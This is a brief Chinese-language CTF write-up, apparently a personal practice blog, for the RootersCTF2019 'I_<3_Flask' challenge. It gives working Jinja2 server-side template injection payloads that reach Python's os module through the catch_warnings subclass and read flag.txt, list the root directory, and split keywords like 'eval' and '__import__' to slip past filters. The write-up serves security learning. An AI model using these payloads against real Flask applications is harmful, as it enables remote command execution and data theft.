'[RootersCTF2019]I_<3_Flask' - ssti - 刷题笔记 | zty153’s

# [RootersCTF2019]I_❤️_Flask

arjun 工具用于

这题没有过滤，直接用常规的注入语句即可

?name={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat flag.txt').read()") }}{% endif %}{% endfor %}

拿到 flag

在该文件同地址的模板是这样的：

但是如果是根目录就是：

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eva'+'l' in b.keys() %}
      {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("ls /").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

还可以：

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}

还可以用 fenjing 直接秒了：

使用方法博客上有：

直接秒了

buuctf

# [RootersCTF2019]I_❤️_Flask

'[GYCTF2020]Ezsqli'

'[NCTF2019]SQLi'